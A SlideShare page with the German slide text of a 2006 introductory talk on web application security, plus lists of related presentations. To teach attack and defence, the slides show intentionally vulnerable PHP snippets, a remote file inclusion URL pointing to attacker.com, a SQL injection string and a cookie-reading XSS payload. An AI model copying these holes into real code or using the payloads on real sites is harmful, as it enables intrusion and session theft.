SlideShare ist ein Scribd-Unternehmen logo

Web Application Security

Jonathan Weiss
Jonathan Weiss

Web Application Security Introduction by Jonathan Weiss. Presented at the Juniter Workend 2006.

Technologie
1 von 61
Downloaden Sie, um offline zu lesen
Web Application Security
Agenda • Einführung und Einordung • Grundlagen Web Applications • Angriff • Verteidigung • Praktischer Teil • Fazit
Einführung
Was ist Security?
Security is a process Bruce Schneier
Angriff Angriff Ziel
Verteidigung Angriff Prevention Detection Response Ziel
Prevention Maßnahmen, die einen Angriff im Vorhinein erschweren sollen Reallife: Tür und Schloß an Euren Häusern IT: Firewalls, ACLs / Rechtemanagement
Detection Maßnahmen, die einen Angriff erkennen sollen Reallife: Alarmanlage im Haus IT: Intrusion Detection Systems, Networks Security Monitoring, Traffic Anomaly
Response Reaktion auf einen Angriff Reallife: Ihr ruft die Polizei, diese probiert den Einbrecher festzunehmen. Beweise werden gesammelt IT: Runterfahren des Rechners, forensiche Analyse
Agenda Angriff Prevention Detection Response Ziel Vorletztes Letzes Workend Workend
Agenda Dieser Workshop Angriff Prevention Detection Response Ziel Im Speziellen für Web Applications
Attack the enemy
Der Prozess Ziel auskundschaften
Der Prozess Ziel auskundschaften Schwachstellen ausfindigmachen
Der Prozess Ziel auskundschaften Schwachstellen ausfindigmachen Schwachstellen ausnutzten
Der Prozess Ziel auskundschaften Schwachstellen ausfindigmachen Schwachstellen ausnutzten Position sichern
Der IT-Prozess Ziel auskundschaften Passive Informationsgewinnung Aktive Informationsgewinnung Schwachstellen ausfindigmachen Remote Exploit Schwachstellen Local Exploit ausnutzten Rootkit Installation Position sichern Weitere Expansion
Angriff Passive Aktive Remote Local Root- Expan- IG IG Exploit Exploit kit sion - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........
Verteidigung Passive Aktive Remote Local Root- Expan- IG IG Exploit Exploit kit sion - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........ - ........
Grundlagen Web Applications
Statische Webseite GET http://www.juniter.de/index.html index.html
Dynamische Webseite GET http://www.juniter.de/index.php MySQL PHP index.php
Angriff
Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
Ziel Informationen über • eingesetzten Server (Apache, IIS, ..) • Skriptsprache (PHP, JSP, ASP, Perl, Rails)
Mittel • Versiongrabbing / Verbinden • Typische Endungen • .php • .jsp • .do • .asp aspx
Angriff Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
Ziel • Webseite manipulieren • Datenbank manipulieren • Lokaler Benutzer für weitere Aktivitäten
Mittel Sicherheitslücken in • Serversoftware • Application Server • Programmiersprache • eigentliches Programm ausnutzen
Typische Schwachstellen • Remote code execution • SQL injection • Format string vulnerabilities • Cross Site Scripting (XSS) • Username enumeration
Remote code execution • register_globals • XMLRPC Schwachstellen
require ($page . quot;.phpquot;); http://www.vulnsite.com/index.php? page=http://www.attacker.com/attack.txt
Remote code execution http://www.vulnsite.com/index.php?page=http:// www.attacker.com/attack.txt
SQL Injection Idee: SQL-Anweisung im Code durch die HTML Parameter manipulieren
<form action=quot;sql.phpquot; method=quot;POSTquot; /> <p>Name: <input type=quot;textquot; name=quot;namequot; /><br /> <input type=quot;submitquot; value=quot;Add Commentquot; /></p> </form> <?php $query = quot;SELECT * FROM users WHERE username = '{$_POST ['username']}quot;; $result = mysql_query($query); ?>
$query = quot;SELECT * FROM users WHERE username = 'steve'quot;;
$query = quot;SELECT * FROM users WHERE username = '' or '1=1'quot;;
Cross Site Scripting Idee: Dem Server JavaScript Code übergeben, den er anderen Nutzern anzeigt. Diese führen dann diesen Code aus
Cross Site Scripting Wirkung: Cookies und somit Logins stehlen
<form action=quot;search.phpquot; method=quot;GETquot; /> Welcome!! <p>Enter your name: <input type=quot;textquot; name=quot;name_1quot; /><br /> <input type=quot;submitquot; value=quot;Goquot; /></p><br> </form> <?php echo quot;<p>Your Name <br />quot;; echo ($_GET[name_1]); ?>
http://victim_site/clean.php?name_1=<script>code</script> http://victim_site/clean.php?name_1=<script>alert (document.cookie);</script>
Username enumeration Idee: Finden von gültigen Benutzernamen durch Testen der Reaktion auf Username/ Passwort Kombination
Username enumeration Wirkung: Bruteforce und Guessing Attacken auf Benutzerkonten deutlich leichter
Username enumeration Der angegebene Login existiert nicht Die angegebene Login/Passwort Kombination stimmt nicht
Verteidigung
Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
Prevention Vorbeugen durch: • Versionsanzeigen abschalten/verfremden • Intrusion Prevention Systeme
Detection Erkennen durch: • Intrusion Detection Systeme • Firewall Logfiles • Serverlogfiles, z.B. UserAgent in Apache Logfile
Verteidigung Passive Aktive Remote IG IG Exploit - ........ - ........ - ........ - ........ - ........ - ........
Prevention Vorbeugen durch: • Systeme immer aktuell halten • Applikation Firewalls / Filter • mod_security • Intrusion Prevention Systeme • Snort-Inline
Secure Coding !
Detection Erkennen durch: • Intrusion Detection Systeme • Logfiles • Netzwerküberwachung • netstat • Network Security Monitoring
Fazit
Ressourcen
Bücher • Unix and Internet Security, Simson Garfikel&co, O’Reilly • Network Security Assesment, ..., O’Reilly • Network Security Monitoring, Richard Beijtrich, Addison-Wesley • Security Warrior, ..., O’Reilly • Practical Cryptography, Bruce Schneier&Nils Fergusson,... • ..., Bruce Sterling, ...
Mailing Listen • Bugtraq • Full-Disclosure • SecurityFocus • IDS • WebAppSec • Nmap
Web • Securityfocus.com • OWASP • Phrack.org • grc.com • CVE, MITRE, ISS X-Force
Fragen?

Empfohlen

Network Security
Network SecurityNetwork Security
Network SecurityJonathan Weiss
 
Splunk und das Triage Tool THOR
Splunk und das Triage Tool THORSplunk und das Triage Tool THOR
Splunk und das Triage Tool THORGeorg Knon
 
Das kleine Einmaleins der sicheren Architektur
Das kleine Einmaleins der sicheren ArchitekturDas kleine Einmaleins der sicheren Architektur
Das kleine Einmaleins der sicheren ArchitekturQAware GmbH
 
Internet of (Every)Thing
Internet of (Every)ThingInternet of (Every)Thing
Internet of (Every)ThingFraunhofer AISEC
 
Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Carsten Muetzlitz
 
Das kleine Einmaleins der sicheren Architektur @heise_devSec
Das kleine Einmaleins der sicheren Architektur @heise_devSecDas kleine Einmaleins der sicheren Architektur @heise_devSec
Das kleine Einmaleins der sicheren Architektur @heise_devSecMario-Leander Reimer
 
Regelkonformität durch neue Architekturen
Regelkonformität durch neue ArchitekturenRegelkonformität durch neue Architekturen
Regelkonformität durch neue ArchitekturenICT Economic Impact
 
Cyber-Sicherheit - Newsletter 2013
Cyber-Sicherheit - Newsletter 2013Cyber-Sicherheit - Newsletter 2013
Cyber-Sicherheit - Newsletter 2013Fraunhofer AISEC
 

Empfohlen

Network Security
Network SecurityNetwork Security
Network SecurityJonathan Weiss
 
Splunk und das Triage Tool THOR
Splunk und das Triage Tool THORSplunk und das Triage Tool THOR
Splunk und das Triage Tool THORGeorg Knon
 
Das kleine Einmaleins der sicheren Architektur
Das kleine Einmaleins der sicheren ArchitekturDas kleine Einmaleins der sicheren Architektur
Das kleine Einmaleins der sicheren ArchitekturQAware GmbH
 
Internet of (Every)Thing
Internet of (Every)ThingInternet of (Every)Thing
Internet of (Every)ThingFraunhofer AISEC
 
Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Hardening Oracle Databases (German)
Hardening Oracle Databases (German)Carsten Muetzlitz
 
Das kleine Einmaleins der sicheren Architektur @heise_devSec
Das kleine Einmaleins der sicheren Architektur @heise_devSecDas kleine Einmaleins der sicheren Architektur @heise_devSec
Das kleine Einmaleins der sicheren Architektur @heise_devSecMario-Leander Reimer
 
Regelkonformität durch neue Architekturen
Regelkonformität durch neue ArchitekturenRegelkonformität durch neue Architekturen
Regelkonformität durch neue ArchitekturenICT Economic Impact
 
Cyber-Sicherheit - Newsletter 2013
Cyber-Sicherheit - Newsletter 2013Cyber-Sicherheit - Newsletter 2013
Cyber-Sicherheit - Newsletter 2013Fraunhofer AISEC
 
Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...
Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...
Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...Serious Detecting
 
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...Serious Detecting
 
MIOsoft: SIM Fraud Detection
MIOsoft: SIM Fraud DetectionMIOsoft: SIM Fraud Detection
MIOsoft: SIM Fraud DetectionMIOsoft Deutschland GmbH
 
Internet lernen - Tipps von Howard Rheingold
Internet lernen - Tipps von Howard RheingoldInternet lernen - Tipps von Howard Rheingold
Internet lernen - Tipps von Howard RheingoldAlex Boerger
 
Fraud detection
Fraud detectionFraud detection
Fraud detectionDr. Sasha Göbbels
 
Meetup #6 Voiture Connectée à Paris
Meetup #6 Voiture Connectée à ParisMeetup #6 Voiture Connectée à Paris
Meetup #6 Voiture Connectée à ParisLaurent Dunys
 
Plagiat : Détection et prévention
Plagiat : Détection et préventionPlagiat : Détection et prévention
Plagiat : Détection et préventionJean-Luc Trussart
 
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...Reconnaissance de panneaux de signalisation routière en utilisant la détectio...
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...Loghin Dumitru
 
Les systèmes RADAR (CFAR)
Les systèmes RADAR (CFAR)Les systèmes RADAR (CFAR)
Les systèmes RADAR (CFAR)amsnet
 
PCR : Polymerase chain reaction : classique et en temps réel
PCR : Polymerase chain reaction : classique et en temps réelPCR : Polymerase chain reaction : classique et en temps réel
PCR : Polymerase chain reaction : classique et en temps réelNadia Terranti
 
Détection des droites par la transformée de Hough
Détection des droites par la transformée de HoughDétection des droites par la transformée de Hough
Détection des droites par la transformée de HoughKhaled Fayala
 
Enfermedad renal crónica 2012
Enfermedad renal crónica 2012Enfermedad renal crónica 2012
Enfermedad renal crónica 2012Mireya Carrasco Tapia
 
Graphes et détection de fraude : exemple de l'assurance
Graphes et détection de fraude : exemple de l'assuranceGraphes et détection de fraude : exemple de l'assurance
Graphes et détection de fraude : exemple de l'assuranceLinkurious
 
Presoutenance
PresoutenancePresoutenance
PresoutenanceJun XIONG
 
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...Georg Knon
 
Processus Audit SI
Processus Audit SIProcessus Audit SI
Processus Audit SIArsène Ngato
 
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...Analyse de méthodes intelligentes de détection de fissures dans diverses stru...
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...Papa Cheikh Cisse
 
Protection perimetrique
Protection perimetriqueProtection perimetrique
Protection perimetriqueMATECH
 
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)Hackfest Communication
 
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...Serious Detecting
 
DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?
DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?
DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?Marc Müller
 
Web Applikations Security
Web Applikations SecurityWeb Applikations Security
Web Applikations Securitygrafiniert UG (haftungsbeschränkt)
 

Weitere ähnliche Inhalte

Andere mochten auch

Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...
Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...
Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...Serious Detecting
 
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...Serious Detecting
 
Internet lernen - Tipps von Howard Rheingold
Internet lernen - Tipps von Howard RheingoldInternet lernen - Tipps von Howard Rheingold
Internet lernen - Tipps von Howard RheingoldAlex Boerger
 
Meetup #6 Voiture Connectée à Paris
Meetup #6 Voiture Connectée à ParisMeetup #6 Voiture Connectée à Paris
Meetup #6 Voiture Connectée à ParisLaurent Dunys
 
Plagiat : Détection et prévention
Plagiat : Détection et préventionPlagiat : Détection et prévention
Plagiat : Détection et préventionJean-Luc Trussart
 
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...Reconnaissance de panneaux de signalisation routière en utilisant la détectio...
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...Loghin Dumitru
 
Les systèmes RADAR (CFAR)
Les systèmes RADAR (CFAR)Les systèmes RADAR (CFAR)
Les systèmes RADAR (CFAR)amsnet
 
PCR : Polymerase chain reaction : classique et en temps réel
PCR : Polymerase chain reaction : classique et en temps réelPCR : Polymerase chain reaction : classique et en temps réel
PCR : Polymerase chain reaction : classique et en temps réelNadia Terranti
 
Détection des droites par la transformée de Hough
Détection des droites par la transformée de HoughDétection des droites par la transformée de Hough
Détection des droites par la transformée de HoughKhaled Fayala
 
Graphes et détection de fraude : exemple de l'assurance
Graphes et détection de fraude : exemple de l'assuranceGraphes et détection de fraude : exemple de l'assurance
Graphes et détection de fraude : exemple de l'assuranceLinkurious
 
Presoutenance
PresoutenancePresoutenance
PresoutenanceJun XIONG
 
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...Georg Knon
 
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...Analyse de méthodes intelligentes de détection de fissures dans diverses stru...
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...Papa Cheikh Cisse
 
Protection perimetrique
Protection perimetriqueProtection perimetrique
Protection perimetriqueMATECH
 
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)Hackfest Communication
 
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...Serious Detecting
 

Andere mochten auch (20)

Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...
Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...
Instruction Manual Minelab Eureka Gold Metal Detector French Language 4901 ...
 
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...
Instruction Manual Minelab X-TERRA 705 Metal Detector French Language (4901-0...
 
MIOsoft: SIM Fraud Detection
MIOsoft: SIM Fraud DetectionMIOsoft: SIM Fraud Detection
MIOsoft: SIM Fraud Detection
 
Internet lernen - Tipps von Howard Rheingold
Internet lernen - Tipps von Howard RheingoldInternet lernen - Tipps von Howard Rheingold
Internet lernen - Tipps von Howard Rheingold
 
Fraud detection
Fraud detectionFraud detection
Fraud detection
 
Meetup #6 Voiture Connectée à Paris
Meetup #6 Voiture Connectée à ParisMeetup #6 Voiture Connectée à Paris
Meetup #6 Voiture Connectée à Paris
 
Plagiat : Détection et prévention
Plagiat : Détection et préventionPlagiat : Détection et prévention
Plagiat : Détection et prévention
 
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...Reconnaissance de panneaux de signalisation routière en utilisant la détectio...
Reconnaissance de panneaux de signalisation routière en utilisant la détectio...
 
Les systèmes RADAR (CFAR)
Les systèmes RADAR (CFAR)Les systèmes RADAR (CFAR)
Les systèmes RADAR (CFAR)
 
PCR : Polymerase chain reaction : classique et en temps réel
PCR : Polymerase chain reaction : classique et en temps réelPCR : Polymerase chain reaction : classique et en temps réel
PCR : Polymerase chain reaction : classique et en temps réel
 
Détection des droites par la transformée de Hough
Détection des droites par la transformée de HoughDétection des droites par la transformée de Hough
Détection des droites par la transformée de Hough
 
Enfermedad renal crónica 2012
Enfermedad renal crónica 2012Enfermedad renal crónica 2012
Enfermedad renal crónica 2012
 
Graphes et détection de fraude : exemple de l'assurance
Graphes et détection de fraude : exemple de l'assuranceGraphes et détection de fraude : exemple de l'assurance
Graphes et détection de fraude : exemple de l'assurance
 
Presoutenance
PresoutenancePresoutenance
Presoutenance
 
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...
Webinar Big Data zur Echtzeit-Betrugserkennung im eBanking nutzen mit Splunk ...
 
Processus Audit SI
Processus Audit SIProcessus Audit SI
Processus Audit SI
 
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...Analyse de méthodes intelligentes de détection de fissures dans diverses stru...
Analyse de méthodes intelligentes de détection de fissures dans diverses stru...
 
Protection perimetrique
Protection perimetriqueProtection perimetrique
Protection perimetrique
 
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
La détection d'intrusions est-elle morte en 2003 ? (Éric Gingras)
 
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...
Quick Start Guide Minelab GPX-4000 Metal Detector French Language 4901 0060 ...
 

Ähnlich wie Web Application Security

DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?
DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?
DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?Marc Müller
 
Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?
Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?
Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?Marc Müller
 
Integration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-PipelineIntegration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-PipelineOPEN KNOWLEDGE GmbH
 
Self Made Web 2.0 Security Testing
Self Made Web 2.0 Security TestingSelf Made Web 2.0 Security Testing
Self Made Web 2.0 Security Testingwurstbrot2
 
Gewinnung von OPEN SOURCE Techniken für junge Unternehmen
Gewinnung von OPEN SOURCE Techniken für junge UnternehmenGewinnung von OPEN SOURCE Techniken für junge Unternehmen
Gewinnung von OPEN SOURCE Techniken für junge UnternehmenBjoern Reinhold
 
Backend-Services mit Rust
Backend-Services mit RustBackend-Services mit Rust
Backend-Services mit RustJens Siebert
 
DevOpsCon 2016 - Continuous Security Testing - Stephan Kaps
DevOpsCon 2016 - Continuous Security Testing - Stephan KapsDevOpsCon 2016 - Continuous Security Testing - Stephan Kaps
DevOpsCon 2016 - Continuous Security Testing - Stephan KapsStephan Kaps
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als CodeJan Gehring
 
Integration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-PipelineIntegration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-PipelineOPEN KNOWLEDGE GmbH
 
Offensive Security – Das Metasploit Framework
Offensive Security – Das Metasploit FrameworkOffensive Security – Das Metasploit Framework
Offensive Security – Das Metasploit FrameworkQAware GmbH
 
Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)
Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)
Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)NETWAYS
 
High Security PHP Applications
High Security PHP ApplicationsHigh Security PHP Applications
High Security PHP Applicationsguest0e6d5e
 
Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...
Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...
Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...Stephan Hochdörfer
 
Cyber Security / OWASP Juice Shop
Cyber Security / OWASP Juice ShopCyber Security / OWASP Juice Shop
Cyber Security / OWASP Juice ShopMartin Abraham
 
Slides__Splunk_UserGroup_20220407.pdf
Slides__Splunk_UserGroup_20220407.pdfSlides__Splunk_UserGroup_20220407.pdf
Slides__Splunk_UserGroup_20220407.pdfAlexanderStz1
 
OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...
OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...
OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...NETWAYS
 
LogFile Auswertung (log analysis)
LogFile Auswertung (log analysis)LogFile Auswertung (log analysis)
LogFile Auswertung (log analysis)Rainer Gerhards
 
HTML5 Offline - Fallstricke für mobile Webseiten und WebApps
HTML5 Offline - Fallstricke für mobile Webseiten und WebAppsHTML5 Offline - Fallstricke für mobile Webseiten und WebApps
HTML5 Offline - Fallstricke für mobile Webseiten und WebAppsUlrich Schmidt
 

Ähnlich wie Web Application Security (20)

DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?
DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?
DWX 2016 - Monitoring 2.0 - Monitoring 2.0: Alles im Lot?
 
Web Applikations Security
Web Applikations SecurityWeb Applikations Security
Web Applikations Security
 
Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?
Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?
Karlsruher Entwicklertag 2016 - Monitoring 2.0: Alles im Lot?
 
Integration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-PipelineIntegration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-Pipeline
 
Self Made Web 2.0 Security Testing
Self Made Web 2.0 Security TestingSelf Made Web 2.0 Security Testing
Self Made Web 2.0 Security Testing
 
Gewinnung von OPEN SOURCE Techniken für junge Unternehmen
Gewinnung von OPEN SOURCE Techniken für junge UnternehmenGewinnung von OPEN SOURCE Techniken für junge Unternehmen
Gewinnung von OPEN SOURCE Techniken für junge Unternehmen
 
check_sap_health
check_sap_healthcheck_sap_health
check_sap_health
 
Backend-Services mit Rust
Backend-Services mit RustBackend-Services mit Rust
Backend-Services mit Rust
 
DevOpsCon 2016 - Continuous Security Testing - Stephan Kaps
DevOpsCon 2016 - Continuous Security Testing - Stephan KapsDevOpsCon 2016 - Continuous Security Testing - Stephan Kaps
DevOpsCon 2016 - Continuous Security Testing - Stephan Kaps
 
Rex - Infrastruktur als Code
Rex - Infrastruktur als CodeRex - Infrastruktur als Code
Rex - Infrastruktur als Code
 
Integration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-PipelineIntegration von Security-Checks in die CI-Pipeline
Integration von Security-Checks in die CI-Pipeline
 
Offensive Security – Das Metasploit Framework
Offensive Security – Das Metasploit FrameworkOffensive Security – Das Metasploit Framework
Offensive Security – Das Metasploit Framework
 
Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)
Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)
Server Überwachung mit Icinga 2 (Webinar vom 15. Februar 2017)
 
High Security PHP Applications
High Security PHP ApplicationsHigh Security PHP Applications
High Security PHP Applications
 
Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...
Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...
Offline. Na und? Strategien für offlinefähige Applikationen in HTML5 - Herbst...
 
Cyber Security / OWASP Juice Shop
Cyber Security / OWASP Juice ShopCyber Security / OWASP Juice Shop
Cyber Security / OWASP Juice Shop
 
Slides__Splunk_UserGroup_20220407.pdf
Slides__Splunk_UserGroup_20220407.pdfSlides__Splunk_UserGroup_20220407.pdf
Slides__Splunk_UserGroup_20220407.pdf
 
OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...
OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...
OSMC 2013 | Enterprise Platforms Monitoring at s IT Solutions AT by Johannes ...
 
LogFile Auswertung (log analysis)
LogFile Auswertung (log analysis)LogFile Auswertung (log analysis)
LogFile Auswertung (log analysis)
 
HTML5 Offline - Fallstricke für mobile Webseiten und WebApps
HTML5 Offline - Fallstricke für mobile Webseiten und WebAppsHTML5 Offline - Fallstricke für mobile Webseiten und WebApps
HTML5 Offline - Fallstricke für mobile Webseiten und WebApps
 

Mehr von Jonathan Weiss

Docker on AWS OpsWorks
Docker on AWS OpsWorksDocker on AWS OpsWorks
Docker on AWS OpsWorksJonathan Weiss
 
ChefConf 2014 - AWS OpsWorks Under The Hood
ChefConf 2014 - AWS OpsWorks Under The HoodChefConf 2014 - AWS OpsWorks Under The Hood
ChefConf 2014 - AWS OpsWorks Under The HoodJonathan Weiss
 
AWS OpsWorks & Chef at the Hamburg Chef User Group 2014
AWS OpsWorks & Chef at the Hamburg Chef User Group 2014AWS OpsWorks & Chef at the Hamburg Chef User Group 2014
AWS OpsWorks & Chef at the Hamburg Chef User Group 2014Jonathan Weiss
 
DevOpsDays Amsterdam - Observations in the cloud
DevOpsDays Amsterdam - Observations in the cloudDevOpsDays Amsterdam - Observations in the cloud
DevOpsDays Amsterdam - Observations in the cloudJonathan Weiss
 
Introduction to Backbone.js
Introduction to Backbone.jsIntroduction to Backbone.js
Introduction to Backbone.jsJonathan Weiss
 
Build your own clouds with Chef and MCollective
Build your own clouds with Chef and MCollectiveBuild your own clouds with Chef and MCollective
Build your own clouds with Chef and MCollectiveJonathan Weiss
 
NoSQL - Motivation and Overview
NoSQL - Motivation and OverviewNoSQL - Motivation and Overview
NoSQL - Motivation and OverviewJonathan Weiss
 
NoSQL - An introduction to CouchDB
NoSQL - An introduction to CouchDBNoSQL - An introduction to CouchDB
NoSQL - An introduction to CouchDBJonathan Weiss
 
Amazon EC2 in der Praxis
Amazon EC2 in der PraxisAmazon EC2 in der Praxis
Amazon EC2 in der PraxisJonathan Weiss
 
Infrastructure Automation with Chef
Infrastructure Automation with ChefInfrastructure Automation with Chef
Infrastructure Automation with ChefJonathan Weiss
 
Rails in the Cloud - Experiences from running on EC2
Rails in the Cloud - Experiences from running on EC2Rails in the Cloud - Experiences from running on EC2
Rails in the Cloud - Experiences from running on EC2Jonathan Weiss
 
CouchDB on Rails - RailsWayCon 2010
CouchDB on Rails - RailsWayCon 2010CouchDB on Rails - RailsWayCon 2010
CouchDB on Rails - RailsWayCon 2010Jonathan Weiss
 
CouchDB on Rails - FrozenRails 2010
CouchDB on Rails - FrozenRails 2010CouchDB on Rails - FrozenRails 2010
CouchDB on Rails - FrozenRails 2010Jonathan Weiss
 
NoSQL - Post-Relational Databases - BarCamp Ruhr3
